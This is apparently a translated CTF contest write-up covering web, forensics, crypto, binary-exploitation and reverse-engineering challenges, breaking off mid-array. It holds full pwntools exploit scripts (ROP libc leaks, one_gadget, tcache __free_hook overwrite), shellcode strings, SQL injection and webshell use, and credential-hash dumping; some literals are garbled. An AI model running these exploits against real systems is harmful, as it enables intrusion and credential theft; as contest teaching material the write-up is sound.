Web

The name doesn't matter, the challenge is easy anyway (题目名字不重要反正题挺简单的)

Approach

Unintended solution: the DASFLAG variable shows up in the phpinfo() output.

NewWebsite

Approach

http://47.111.104.169:56200/?r=content&cid=2

The cid parameter has a SQL injection vulnerability with no filtering at all; dumping the database gives the admin credentials admin/admin.

In the admin panel, the watermark image setting points at a .php3 file; visiting it only shows phpinfo, which is not useful by itself.

Visiting the /upload/watermark/ directory shows that directory listing is enabled, and it contains a shell file that the server will parse:

http://47.111.104.169:56200/upload/watermark/82061604228330.php3

Blind guess for the webshell password: cmd.

Misc

password

After downloading and extracting the archive we get the file WIN-BU6IJ7FI9RU-20190927-152050.raw.

Drop it onto Kali and analyze it with Volatility:

volatility -f WIN-BU6IJ7FI9RU-20190927-152050.raw imageinfo

The profile is identified as Win7SP1x86.

volatility -f WIN-BU6IJ7FI9RU-20190927-152050.raw --profile=Win7SP1x86 hivelist

Get the virtual address of the SAM hive.

volatility -f WIN-BU6IJ7FI9RU-20190927-152050.raw --profile=Win7SP1x86 hashdump -y 0x93fc41e8

Dump the hashes.

Crack the hash of the CTF user; the plaintext password is: qwer1234

Then take its SHA-1:

db25f2fc14cd2d2b1e7af307241f548fb03c312a

Kaomoji (颜文字)

Approach

The challenge is called Kaomoji, but it actually has little to do with kaomoji.

Open the capture in Wireshark; there is a file index_demo.html. Copy its contents out and save them locally.

Open it locally and view the page source; there is some base64-looking text.


A web search shows this is base64 steganography, and there is a ready-made script online:

https://www.it610.com/article/1290949422569562112.htm

Save the base64 stego text as code.txt. Decoding script (the original is Python 2; it is given here in Python 3 form, with the lost line-break escapes restored):

import base64


def get_base64_diff_value(s1, s2):
    # index distance between the first differing characters of the stego line
    # and its canonical re-encoding; these are the hidden bits
    base64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
    for i in range(len(s2)):
        if s1[i] != s2[i]:
            return abs(base64chars.index(s1[i]) - base64chars.index(s2[i]))
    return 0


def solve_stego():
    with open('code.txt') as f:
        file_lines = f.readlines()
    bin_str = ''
    for line in file_lines:
        steg_line = line.replace('\n', '')
        # decode and re-encode: a normal encoder zeroes the unused padding bits
        norm_line = base64.b64encode(base64.b64decode(steg_line)).decode()
        diff = get_base64_diff_value(steg_line, norm_line)
        print(diff)
        pads_num = steg_line.count('=')
        # one '=' hides 2 bits, '==' hides 4 bits
        if diff:
            bin_str += bin(diff)[2:].zfill(pads_num * 2)
        else:
            bin_str += '0' * pads_num * 2
    print(goflag(bin_str))


def goflag(bin_str):
    # regroup the collected bits into bytes
    res_str = ''
    for i in range(0, len(bin_str), 8):
        res_str += chr(int(bin_str[i:i + 8], 2))
    return res_str


solve_stego()
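An added example (not the writeup's or the linked script's code) showing both halves of the technique the script above exploits: hiding bits in the unused low bits before base64 padding, a defender-side check that flags lines whose spare bits are non-zero, and the extraction. The cover lines and the secret are constructed.

```python
import base64

B64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"


def spare_bits(enc):
    """A padded base64 line has unused low bits in its last data character:
    2 bits before a single '=', 4 bits before '=='. Standard encoders always
    leave them zero and decoders ignore them, which is what the hiding abuses."""
    return enc.count("=") * 2


def hide(cover_lines, secret):
    """Encode each cover line and write the next secret bits into its spare
    bits. Unpadded lines carry nothing; bits left over at the end are lost."""
    bits = "".join(f"{b:08b}" for b in secret)
    out = []
    for raw in cover_lines:
        enc = base64.b64encode(raw).decode()
        n = spare_bits(enc)
        if n and bits:
            chunk, bits = bits[:n].ljust(n, "0"), bits[n:]
            last = len(enc) - enc.count("=") - 1          # last data character
            enc = enc[:last] + B64[B64.index(enc[last]) | int(chunk, 2)] + enc[last + 1:]
        out.append(enc)
    return out


def suspicious_lines(lines):
    """Defender's check: a decode/re-encode round trip changes a line only
    when its spare bits are not zero, which no normal encoder produces."""
    return [i for i, line in enumerate(lines)
            if base64.b64encode(base64.b64decode(line)).decode() != line]


def reveal(stego_lines):
    """Recover the hidden bits: the index difference between the stego
    character and its canonical re-encoding is the value of the spare bits
    (the same quantity the writeup's script computes as diff)."""
    bits = ""
    for line in stego_lines:
        n = spare_bits(line)
        if not n:
            continue
        norm = base64.b64encode(base64.b64decode(line)).decode()
        last = len(line) - line.count("=") - 1
        diff = B64.index(line[last]) - B64.index(norm[last])
        bits += format(diff, f"0{n}b")
    data = bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits) - 7, 8))
    return data.rstrip(b"\x00")      # drop zero filler from unused spare bits


COVER = [b"a", b"bc", b"def", b"gh", b"i", b"jklm", b"no", b"p"]   # constructed

if __name__ == "__main__":
    stego = hide(COVER, b"hi")
    print(stego, suspicious_lines(stego), reveal(stego))
```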

Running it outputs a key.

Then decode index_demo.html with snow, which gives the following:

base64隐写,snow解密,转莫斯 (base64 steganography, snow decoding, then Morse code)

67b33e39b5105fb4a2953a0ce79c3378

Hidden Secret (隐藏的秘密)

Approach

The hint says the computer has no such user, yet one can still log in. As everyone knows, hidden accounts usually look like test$.

Then analyze the attachment with Volatility; the profile is Win2003SP2x86.

List the users in the SAM.

Then crack the NTLM hashes in bulk and match each plaintext to its username, for example:

JbpPIa4$:980099
vz1rKjG$:565656
yW1fMSd$:19861013
oR9C4h0$:a520520
etiH3Lp$:321321

Then MD5 each of these in bulk and brute-force the flag on the platform. I forgot to take a screenshot the first time, and later attempts no longer worked, so there is no screenshot of the final flag.

Between Real and Fake (虚实之间)

Approach: first extract the copy of the mingwen file from the attachment.

Repair the archive with WinRAR's built-in repair, or simply use 7z, to extract mingwen副本.txt directly.

Use ARCHPR to run a known-plaintext attack against the encrypted archive.

The attack yields the password.

Open the original encrypted file.

Then it is a rail fence cipher.

Crypto

Classical Beauty++ (古典美++)

Approach

SZWLVSRVVZICMUOJYIIZBSVSSITFSWHPCWCFPVPFXJMWRVJICVRGTCFLHPRJKJKSRVWYFUSEWHFXLHFOSFLYPFXXYFPOEGXFXMBUHVNIYHNDWXPGBXWSYBNDVQRVYRTZUWKTFSKUMVERCCRSBEMKEDRUNYYVRYKXFOKVLVXYGTRQZOEHFEYKJRKRVXFPBOINXFTCSRQCKIGBXWLVOQVVOSFLCRRWXYFQWUHWFGRVVZICMYBUQSKJASUWLRURVVBAVSCTZOPVEUWKKGLQZCRUHJBLRSRSBTFSCYIJICFVDRUUFSIHWYFQONPEGTYBUSMTUSFVVLLOEIGRRGFEGJKIKPMYURAEBHOIIVFNMBVRJKICGYHPMFQOJVLVQYGJHHZUUOJOESFJZVGSIBLUVPEINYZRGISVRHFKIIHPSRWHZTYDGRMEUKSEWMKXYGVPTKZQVVGMUOMHCLOVUMRIRTKICXRUJFSDSRUSWLGZCLRXTMAVESUZQCDDRRHCRKRTLUGHZQXFPLSFIXYFAIGESRSBGRVWYFDSCOTRTRWKZICMRVFXKYUYZZFIKPFSIVICGYTKHVJVAVRIECMYGKKMJJQVROPKIGBBQSKIGBXRJKVKPCLRXEMKEVXRJPGYRASSYJVWLVZJZROPKIGBBPIRUFCDHAYZGKFXPUORGRBEEZRVZQKRCMIKLXVWCBZIMWFJZFIJKICHFSSWUFSYRYJFUVZFLNBQJVUCCJISCBXIVCRFZRUPUBURAEXMICGXYFDOCORVWCFTRQVUMOEHRUJUCEGIIIMKDDRPNGZVVMMFDOCOIECWHYLWKJKSJKIJBGRROSLEGALVXSFESKWMEHQCDHAYFPSEHEIUFSTHRKSCCWWLVFYFKKPVUKSJHIKIYHNRYCEZSWRYIUFCLVEEEKWCHWUPUBZWLZOITFUCFVQSVDPZDCVRGPVBPBKVIMFPOCWLZOEGFIXYJQGFUXZOFSIOIJTMBJLRKICGTKSFMPCFPEEERVFXKYUFWJZEJOMHRYIIZECFGSGQMFKXRZUWTFUWYPUWEJSWGFSINRFXJSUJIRTRVVUINBQBFRRVUMZZVXVORCYHVJUGZCLXNBQUFRHGSYQKLGVUMGRBMKPTSIBIJUFOKVESPSHKKIIJEVKGMJUYBTHFLURVVQMNPLRVUAYBRZRWMKVBSFUPFOEWKXHVJTSXRXKPYZZFIYBBBFLHVBUVRWPRUGHLGINBQCIOSEHGHLGIVJRVVUFLURVFXKYURVVBAVSCBZFIXSYBUZSIEQHFVEPQPSJHRKMWGYHFVHYBRJEZOGKFQHVSGTZVLRMJTROPIJEVKWLIPSUYWLVFYFKKLFXDIEQCZUJZJHIDUMQFPIFVRODRRXUFSGHSGMCHYDXNBJYNLXYUFSZULVBBGURAEXYFUWLVBLHZSEKIGSJLXYJLYJKINBQFRWLVSEZRGXYFPSNDWEPMBVOMJUCBZQKKIGGKLQVBQWKGMUORGFXRUBROCOXYFPWXKXNPPRSXXZTFOCOLRWCHFDWBUFSDZLRURVVQEDFMTKKITPSBKUCZTWCLNRFXNZVDWVNYODLWKIGGEHAQFYZRQHFSYIJWVRMGORQHJICHILIUUMQLUXJFWOJVLVTNCBHJROAMTXVKTCMZQKRTWCLUIWBJZZQKKIPCLJLKICOZUHFZMIKKMELWCLFSLMBARQEXFGHRQHNIYHRQMXOMFRQXCJRHCHKZSJGYHPCUFWENQVGMFRVOZOEBFLXCMLSMHVUPRCRVOGFPVRSWZTFOCOWVFGHNUMKUCBLSWFNCKYHVV

This is a Vigenère cipher; decrypting it on the usual websites requires the key.

There is an open-source project on GitHub that guesses the key:

https://github.com/atomcated/Vigenere

The key in uppercase is ORDERBY; its MD5 is the flag:

C82BBC1AC4AB644C0AA81980ED2EB25B
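An added example, not code from the writeup or from the linked GitHub project, of how such key guessing works: the index of coincidence finds the period, then a chi-squared fit against English letter frequencies recovers each key letter. The English sample text is constructed; it is encrypted under ORDERBY and the key is recovered from the ciphertext alone.

```python
from collections import Counter

ALPHA = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
# English letter frequencies in percent, A..Z
ENGLISH = [8.17, 1.49, 2.78, 4.25, 12.70, 2.23, 2.02, 6.09, 6.97, 0.15, 0.77, 4.03, 2.41,
           6.75, 7.51, 1.93, 0.10, 5.99, 6.33, 9.06, 2.76, 0.98, 2.36, 0.15, 1.97, 0.07]


def letters_only(text):
    return "".join(c for c in text.upper() if c in ALPHA)


def vigenere(text, key, decrypt=False):
    """Shift each letter by the matching key letter; the key repeats."""
    out = []
    for i, ch in enumerate(text):
        k = ALPHA.index(key[i % len(key)])
        out.append(ALPHA[(ALPHA.index(ch) + (-k if decrypt else k)) % 26])
    return "".join(out)


def index_of_coincidence(col):
    n = len(col)
    if n < 2:
        return 0.0
    return sum(c * (c - 1) for c in Counter(col).values()) / (n * (n - 1))


def guess_key_length(ct, max_len=20, threshold=0.058):
    """Smallest period whose columns look like monoalphabetic English (IC near
    0.066) rather than a mixture of several shifts (IC near 0.04)."""
    for length in range(1, max_len + 1):
        cols = [ct[i::length] for i in range(length)]
        if sum(index_of_coincidence(c) for c in cols) / length > threshold:
            return length
    return None


def best_shift(col):
    """Chi-squared fit of every Caesar shift of one column against English."""
    best, best_score = 0, float("inf")
    for shift in range(26):
        counts = Counter(ALPHA[(ALPHA.index(c) - shift) % 26] for c in col)
        score = 0.0
        for i, a in enumerate(ALPHA):
            expected = ENGLISH[i] * len(col) / 100
            score += (counts[a] - expected) ** 2 / expected
        if score < best_score:
            best, best_score = shift, score
    return best


def recover_key(ct, length):
    """One Caesar recovery per column gives the key letter for that column."""
    return "".join(ALPHA[best_shift(ct[i::length])] for i in range(length))


# constructed English sample, long enough for per-column statistics
SAMPLE = (
    "The quick progress of computing has made classical ciphers little more than puzzles, "
    "yet they still teach the habits that protect modern systems. A Vigenere cipher repeats "
    "a short key over the whole message, so every letter encrypted with the same key letter "
    "is only a Caesar shift of the plaintext. Once an analyst guesses the period, each column "
    "can be attacked on its own by comparing its letter counts with the counts expected from "
    "ordinary English. The index of coincidence measures how likely two letters drawn from a "
    "column are to match, and real language scores far above random noise. This is why the "
    "length of the key matters less than the fact that it repeats at all, and why a one time "
    "pad that never repeats is the only version of this idea that resists the attack. Modern "
    "stream ciphers learned the same lesson and derive long keystreams from short secrets "
    "with a pseudorandom generator, which is safe only while the generator has no short "
    "period and the keystream is never reused for two different messages. Every writeup of "
    "a contest challenge that breaks a repeating key is a small reminder that secrets must "
    "be long, random, and used only once. Defenders who know these old attacks are better "
    "placed to review a protocol and to spot a generator with too little internal state."
)
PT = letters_only(SAMPLE)
CT = vigenere(PT, "ORDERBY")

if __name__ == "__main__":
    n = guess_key_length(CT)
    key = recover_key(CT, n)
    print(n, key, vigenere(CT, key, decrypt=True)[:40])
```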

LFSRXOR

Approach

The challenge uses two LFSR pseudo-random generators to produce two keystreams.

Each keystream encrypts content once, giving two ciphertexts.

The way in is that the two keystreams have very short periods that are coprime: one is 15, the other 31.

So there is one byte of the first keystream that has encrypted the same plaintext positions as every single byte of the second keystream.

Because XOR is an involution, brute-forcing one byte of one keystream recovers the entire other keystream, which then decrypts the ciphertext.

The solve script (Python 2 as posted; the two ciphertext literals lost the backslashes of their \x escapes during extraction, so they have to be restored from the original attachment before the script will run):

cipher1 = 'xbbxd3x08x15xc6:x08xb2xb2x9fxe4pxc7xecx7fxfd)xf6fx9cxe4xd12xaeJx81xb1x88xabxa5Vxa9x88x14xdf`~xf6xdbJxb4x06S!0xbbxe4x1axe6Rx8ex84Xx19Kx95x07Cxe8xb2'xa9x80x15xecx8fx8dYnKx85x99xb7!x134xa9xb6x15xcf&rx9bxe1x99xe4]3h~xf0xa9xa5x14xee}xd19lx14hx07v *a0x12x14xfex0fx05xdemx1dxe4s2Jx7fxc28xf6RRx8exbaxb2mx18Mxf1xef!4x17xa8xb4x14xc2x8fxb9Y:Kxaax06T!x1bxbbxfdxf6Gvx8ex9axebxd9Kxbbx06Nx9ax82cxa9xa0x14xed!x04xdbmx13xe5w3Bx7fxd0xa9xbfxb7x9cxe3xd00x83Kx86xab3x7fxc1xbbxfdx11x15xdfx8ex80Yx07xd8xe5]2mxe9xbbxce`x91ox8fx8cY!x81xe4Jx92x8cxa7Tx16Ex15xf1WMY(xb8[x8e2y~xcbMx10x15xc7x1fWYx0cKx87xcexe5 !bxa8x83x14xec6xd1!xc8x905xe52Lxf1xbaxcfnx9dx9dxe7uxadmx06xe4n2rxd8xbaxedxf6x7fx9dxd8xd02mx12Gx07Yx89x7fxc0xa8xa4x15xe5x043Yx1eJxaex07nx94x87xbbxcf_x8dx9dxd1x14Y,x9exe5bxd7x8cx7fxf7xa8x8fx14xc7x8fxb3xb6xf1x93xe4Oxddxc4xdbxbaxf6!x15xfd.xd1x18xcfxf6x03xea2Ex7fxe1xa9xa5xfex9dxc9xd1;xd9xeex05x06zxc8xb2xbbxe2xf7{JW4xcdmx1axe5Ux8d x0f&x14x7fxf6x9dxd4Exbfxc3xdbxe4Lxe1xf7x90xbbxdaZxf4x9dxd13xb8m3xe2D3o~xf8Hxf6U*x07lYx03Kxabx07~xa3x87xbbxc9xf7sAQx08Y6Jx86x07Yxecxf7xbbxc6sx15xc6x7fEYx02Jx95x07Z x11xbbxc6Tx15xfc-xd0x06xe6x9f-x07^ x15xbbxcczx14xf3x8fx97xd4l9tx85xe8x8axbexbbxf9xf6fx9dxf2xd19xa2Kxb6xcdxcfxf6~xd5xa9xaax15xd8x8exb3x81m9xe4fxb2!x1exbaxd8sxfdx11x08Wxa1l;x01x07_!x11xbbxddxf6xx9dxf0x17Yx15xfex02xc7xa0!.Wxa9xa5x8fx9cxe8xd1x12mx04xe5s3Q~xddxa9xa3x15xdbx8fxacxafxecxbbx10xde2_xbaxbaxe8xf6f.x1exd1x17lx06xe4Uxddxf0xd6~x0fAx14xcbx8exb0Yx1fJxb2xe4xb3!"xbaxfeUx14xedYxd0>l-~x06P 1xbbxf2xf6waDxd1(mx12`[email protected]b6~xfaxa9xb1xb0x9dxfbx18xfbm&xe4v2wxcexbaxcboxd5x07x11QXxc8x9cxd3xd03x9dxb5x1exd72Sxf2ryxf1Wx9cxc89YrKx8fxffx8axe0xb5{xa9xaexb1x9dxddxd1=xbeKxa3x06e!x08xbaxd2xf6jx9cxf6xd0x0fl#xe5oxf5xaa~xc2xa9x99x15xea6xd1:xe7xa8xe4nxbb nVxa9x91x14xf9}xd0!m/xe5|2ox81xbaxf8rx14xebtRxc9xecxdd`xbfxc6x81xdfKXWxb3o.%xa9xcdxb9x14xfdx97x83x8eOnx03xb6iuuxabx9dxbcx15xf4xc3xd6xc1'
cipher2 = 'pxfdx1ffxcaBxa5xe6`x87xa8x8cix855x92O8Pxa5}^xd8xedx1ax88=cxe0x9fxedqxf8xe1%x7fXxd2xbaxbex03xa8x9ax9cx075x98"xcaxedxa4C^xc6.jxecxfax10xa7xd9x01x06x87x90fxccxf6x1bx0cxdexcc,xfbxf0xc74x94xcfjx8ayxd5xd2`[email protected]!DSpxf5x12fxf1xf6#x80xbex16xa8xaeFxd0xd1xd4xadxb9xf7#x16x08xb2[x1ax87x8bxa0xfaEFxbfx86x8bx8cx90xa4xd5xfbcRxe2Wx9cn5x8bxcfQ"xf2x16x10xb2Ix1ax88x8bx8cjx16xebpxccSxd2x90xa8|qx05xafqxfaxcaHE{x1axba#xfdx17/xb2Lx1ax87x8ax90xc9Dmpxefx0efxf2Z|Sx00Rxfcx1cx9dn5x84xceSxb0xa4M_xffxb9x1ax8ax1d\x98D\pxcb*fxdcVxd0xd5Qxecx1axfaxf0x91xa8xd4x8axcax9c-x17x07xb2_xffnx8ax83xfbxc2x00x10x87x83xaeFxf7#xd4xbe'xa9x8a$IMpx14xe8xc0xa4zxd1xb2Hxe6ex8bxb0xcfxb1x01/i}tx03xc1x84x00!x86x93gxedxf7x1dxc3xbfx01cx06KI[xd5x929gxa4tx87xb2\x1bx8dx0bxd9x0bDpxf5omxe1x16x0e}|[email protected]\cx17&x07xc8xda~x8bx88x86DSxebx87x87fxdaxf73rxcaSxd9xfaxfaI`xd5x889^Rx97xaeFxf6x1ax92Nxd8*Erxc3x16xe0)x91xba|_Qx83x00>;xff5x82xceX"xd7x17x08Pxaex1axb1x8ax8fxc9Epxa7x86x86gxf6m|oxbfx1cxa9xa1x9c+xc9x1excfI#xfcx92^xc1xb8x1bxadx8ax9exceEuxb8$xe0x0bx90x87}[x0fSxcab]xd2xaaUxcfh"xfcxa2_xdd/yx15xc71x06x8dxacx19xa0tx0elxe9xc6%4x9dx80Uxe3xfdFx8dxeex17.+x9bxb3xf0x83wx16xd9'

# keystream 1 has period 15, keystream 2 has period 31, and gcd(15, 31) == 1.
# Guess one byte of keystream 1: positions 0, 15, 30, ... all use that byte,
# and 15*k mod 31 runs through every residue, so those positions reveal all
# 31 bytes of keystream 2. The posted loop reused the name `one` for both
# loops and called ord() on an int; that is fixed here.
for guess in range(256):
    truekey = [0] * 31
    i = 0
    for _ in range(31):
        truekey[i % 31] = chr(ord(cipher1[i]) ^ ord(cipher2[i]) ^ guess)
        i += 15
    flag = ""
    for i in range(len(cipher2)):
        flag += chr(ord(truekey[i % 31]) ^ ord(cipher2[i]))
    if 'DASCTF' in flag:
        print flag
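An added example, not the challenge's or the writeup's code, that rebuilds the situation above with two tiny Fibonacci LFSRs (4 and 5 bits, hence keystream periods of 15 and 31 bytes), encrypts a constructed plaintext under each, and recovers the whole second keystream from a single guessed byte of the first. The plaintext, seeds and taps are constructed.

```python
from math import gcd


def lfsr_stream(state, taps, nbits, nbytes):
    """Fibonacci LFSR: output the low state bit, feed the XOR of the tapped
    bits back into the top. With a primitive polynomial the bit sequence has
    period 2**nbits - 1; that is odd, so bytes built from 8 consecutive bits
    repeat with exactly the same period."""
    out = []
    for _ in range(nbytes):
        byte = 0
        for _ in range(8):
            bit = state & 1
            byte = (byte << 1) | bit
            fb = 0
            for t in taps:
                fb ^= (state >> t) & 1
            state = (state >> 1) | (fb << (nbits - 1))
        out.append(byte)
    return bytes(out)


def xor_bytes(data, stream):
    """Encrypt or decrypt by XOR with a repeating keystream."""
    return bytes(b ^ stream[i % len(stream)] for i, b in enumerate(data))


def recover_keystream(c1, c2, p1, p2, marker=b"DASCTF"):
    """c1 = P ^ K1 (period p1), c2 = P ^ K2 (period p2), gcd(p1, p2) == 1.
    c1[i] ^ c2[i] == K1[i % p1] ^ K2[i % p2]. At i = 0, p1, 2*p1, ... the
    first keystream always contributes K1[0], while i mod p2 walks through
    every residue, so one guessed byte yields all p2 bytes of K2. A wrong
    guess XORs every recovered byte with the same constant, so the marker
    only shows up in the decryption for the right guess."""
    assert gcd(p1, p2) == 1 and len(c1) > (p2 - 1) * p1
    for guess in range(256):
        k2 = bytearray(p2)
        for j in range(p2):
            i = j * p1
            k2[i % p2] = c1[i] ^ c2[i] ^ guess
        pt = xor_bytes(c2, k2)
        if marker in pt:
            return bytes(k2), pt
    return None


# constructed demo: x^4+x^3+1 (taps 0,1) and x^5+x^3+1 (taps 0,2) are primitive
K1 = lfsr_stream(0b0001, (0, 1), 4, 15)       # period 15 bytes
K2 = lfsr_stream(0b00001, (0, 2), 5, 31)      # period 31 bytes
PLAINTEXT = b"DASCTF{constructed_sample_plaintext} " * 14   # longer than 15*31 bytes
C1 = xor_bytes(PLAINTEXT, K1)
C2 = xor_bytes(PLAINTEXT, K2)

if __name__ == "__main__":
    k2, pt = recover_keystream(C1, C2, 15, 31)
    print(k2 == K2, pt[:40])
```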

PWN

what the f**k printf?

Approach

After 15 bytes of 0x1f the input overflows.

from pwn import *

context.log_level = 'debug'
elf = ELF('./pwn_printf')
p = remote('47.111.96.55', 54606)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
gadget_list = [0x45226, 0x4527a, 0xf0364, 0xf1207]    # one_gadget offsets for this libc
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
pop_rdi_ret = 0x401213

# stage 1: overflow, then leak the address of puts() through a puts(puts@got) call
payload = "0x20" * 15
p.recvuntil('interesting\n')
p.sendline(payload)
payload = "a" * 8
payload += p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(pop_rdi_ret)
payload += p64(0x40) + p64(0x4007C6)
p.sendline(payload)
#-----------------------------------------
puts_addr = u64(p.recv(6).ljust(8, '\x00'))
libc_base = puts_addr - libc.symbols['puts']
var = libc_base + gadget_list[2]
#-----------------------------------------
# stage 2: return into the chosen one_gadget
payload = "a" * 8
payload += p64(var)
p.sendline(payload)
p.interactive()

737e31e0437d1f6d960ce8d4c887cb9a

Blend_pwn

Approach

# _*_ coding:utf-8 _*_
from pwn import *

context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']
prog = './blend_pwn'
#elf = ELF(prog)
# p = process(prog)#,env={"LD_PRELOAD":"./libc-2.27.so"})
libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
p = remote("47.111.104.169", 57704)

def debug(addr, PIE=True):
    debug_str = ""
    if PIE:
        text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
        for i in addr:
            debug_str += 'b *{}\n'.format(hex(text_base + i))
        gdb.attach(p, debug_str)
    else:
        for i in addr:
            debug_str += 'b *{}\n'.format(hex(text_base + i))
        gdb.attach(p, debug_str)

def dbg():
    gdb.attach(p)
#-----------------------------------------------------------------------------------------
s = lambda data :p.send(str(data)) #in case that data is an int
sa = lambda delim,data :p.sendafter(str(delim), str(data))
sl = lambda data :p.sendline(str(data))
sla = lambda delim,data :p.sendlineafter(str(delim), str(data))
r = lambda numb=4096 :p.recv(numb)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
it = lambda :p.interactive()
uu32 = lambda data :u32(data.ljust(4, ' '))
uu64 = lambda data :u64(data.ljust(8, ' '))
bp = lambda bkp :pdbg.bp(bkp)
li = lambda str1,data1 :log.success(str1+'========>'+hex(data1))

def dbgc(addr):
    gdb.attach(p, "b*" + hex(addr) + "\n c")

def lg(s, addr):
    print('\033[1;31;40m%20s-->0x%x\033[0m' % (s, addr))

# unused shellcode template strings from the author's boilerplate; the backslashes
# of their \x escapes were lost when the page was extracted
sh_x86_18="x6ax0bx58x53x68x2fx2fx73x68x68x2fx62x69x6ex89xe3xcdx80"
sh_x86_20="x31xc9x6ax0bx58x51x68x2fx2fx73x68x68x2fx62x69x6ex89xe3xcdx80"
sh_x64_21="xf7xe6x50x48xbfx2fx62x69x6ex2fx2fx73x68x57x48x89xe7xb0x3bx0fx05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------
def cho(idx):
    sla("Enter your choice >", str(idx))

def add(con='a'):
    cho(2)
    sla("input note:", con)

def delete(idx):
    cho(3)
    sla("index>", idx)

def sho():
    cho(1)

def show():
    cho(4)

def magic(strt):
    cho(666)      # the posted script called an undefined choice(666) here
    sla("Please input what you want:", strt)

def exp():
    # debug([0x11cb])
    sla("Please enter a name: ", "%11$p")
    ru("wrong!")
    #-------------------------------------------------------------leak libc
    sho()
    ru("Current user:")
    ru("0x")
    data = int(r(12), 16)
    addr = data - libc.sym['__libc_start_main'] - 240
    lg('addr', addr)
    one = addr + 0x4526a
    #---------------------------------------------------------------leak heap
    # magic("a"*0x28)
    pay = p64(one)*4 + p64(0)*12
    add(pay)
    add(pay)
    delete(0)
    delete(1)
    show()
    ru("index 2:")
    # ru("0x")
    heap = uu64(r(6))
    lg('heap', heap)
    #---------------------------------------------------------------triger
    lg('one', one)
    magic(p64(one)*4 + p64(heap+0x20)[0:6])   # the last bytes can overwrite rbp
    it()

if __name__ == '__main__':
    exp()

babyheap

Approach

# _*_ coding:utf-8 _*_
from pwn_debug import *

pdbg = pwn_debug("babyheap")
pdbg.context.terminal = ['tmux', 'splitw', '-h']
context.log_level = 'debug'
pdbg.local("./libc.so.6")   #32/64
pdbg.debug("2.27")
pdbg.remote('47.111.104.169', 56303)
switch = 3
if switch == 1:
    p = pdbg.run("local")
elif switch == 2:
    p = pdbg.run("debug")
elif switch == 3:
    p = pdbg.run("remote")
#-----------------------------------------------------------------------------------------
s = lambda data :p.send(str(data)) #in case that data is an int
sa = lambda delim,data :p.sendafter(str(delim), str(data))
sl = lambda data :p.sendline(str(data))
sla = lambda delim,data :p.sendlineafter(str(delim), str(data))
r = lambda numb=4096 :p.recv(numb)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
it = lambda :p.interactive()
uu32 = lambda data :u32(data.ljust(4, ' '))
uu64 = lambda data :u64(data.ljust(8, ' '))
bp = lambda bkp :pdbg.bp(bkp)

def bpp():
    bp([])
    # input()

def dbg(arg):
    bp([arg])
    #input()

def lg(s, addr):
    print('\033[1;31;40m%20s-->0x%x\033[0m' % (s, addr))

elf = pdbg.elf
# libc=pdbg.libc
# unused shellcode template strings from the author's boilerplate; the backslashes
# of their \x escapes were lost when the page was extracted
sh_x86_18="x6ax0bx58x53x68x2fx2fx73x68x68x2fx62x69x6ex89xe3xcdx80"
sh_x86_20="x31xc9x6ax0bx58x51x68x2fx2fx73x68x68x2fx62x69x6ex89xe3xcdx80"
sh_x64_21="xf7xe6x50x48xbfx2fx62x69x6ex2fx2fx73x68x57x48x89xe7xb0x3bx0fx05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------
libc = ELF("./libc.so.6")

def cho(idx):
    sla(">>", str(idx))

def add():
    cho(1)
    # sla("input note:",con)

def delete(idx):
    cho(4)
    sla("index?", idx)

def show(idx):
    cho(2)
    sla("index?", str(idx))

def edit(idx, sz, con):
    cho(3)
    sla("index?", str(idx))
    sla("Size:", str(sz))
    sa("Content:", con)

def exp():
    # debug([0xB0C])
    #-----------------------------------------leak libc & heap
    show(-14)
    ru('\n')
    data = uu64(r(6))
    lg('data', data)
    addr = data - libc.sym['_IO_2_1_stdout_']
    lg('addr', addr)
    fh = addr + libc.sym['__free_hook']
    sys = addr + libc.sym['system']
    lg('sys', sys)
    #-----------------------------------------shell
    # the steps below are similar to lctf2018-pwn-easy_heap
    #------------------------step1
    for i in range(7):
        add()
    for i in range(3):
        add()   # 7 8 9
    for i in range(6):
        delete(i)
    delete(9)
    for i in range(6, 9):
        delete(i)
    #------------------------step2
    for i in range(7):
        add()
    add()   #7
    add()   #8
    add()   #9
    for i in range(6):
        delete(i)
    delete(8)   #tcache
    delete(7)
    add()
    # dbg()
    # raw_input()
    edit(0, 0xf8, 'a')
    delete(6)
    delete(9)
    #------------------------step3
    for i in range(7):
        add()
    add()
    add()
    add()
    delete(9)
    edit(4, 0x20, '/bin/sh\x00')
    edit(0, 0x20, p64(fh))
    add()
    add()
    edit(11, 8, p64(sys))
    delete(4)
    # dbg()
    it()

if __name__ == '__main__':
    exp()

Reverse

easyZ

At first static analysis kept throwing errors, which made me think it was my machine.

While trying dynamic debugging I happened to notice that it needs qemu.

So I set up the environment and continued with dynamic debugging.

By the time I found the right spot, the math was no longer much of a problem. Still a strong challenge, but it was found in the end.

Time to fight back: locate the code backwards from the end, find the disassembly, and step through the instructions bit by bit.

The program first checks the input length, then encrypts the input and compares it.

No interest in anything fancy; isn't plain brute force good enough? Can't help thinking: is that all???

a = [0x0000b2b0, 0x00006e72, 0x00006061, 0x0000565d,
     0x0000942d, 0x0000ac79, 0x0000391c, 0x0000643d,
     0x0000ec3f, 0x0000bd10, 0x0000c43e, 0x00007a65,
     0x0000184b, 0x0000ef5b, 0x00005a06, 0x0000a8c0,
     0x0000f64b, 0x0000c774, 0x000002ff, 0x00008e57,
     0x0000aed9, 0x0000d8a9, 0x0000230c, 0x000074e8,
     0x0000c2a6, 0x000088b3, 0x0000af2a, 0x00009ea7,
     0x0000ce8a, 0x00005924, 0x0000d276, 0x000056d4,
     0x000077d7, 0x0000990e, 0x0000b585, 0x00004bcd,
     0x00005277, 0x00001afc, 0x00008c8a, 0x0000cdb5,
     0x00006e26, 0x00004c22, 0x0000673f, 0x0000daff,
     0x00000fac, 0x000086c7, 0x0000e048, 0x0000c483,
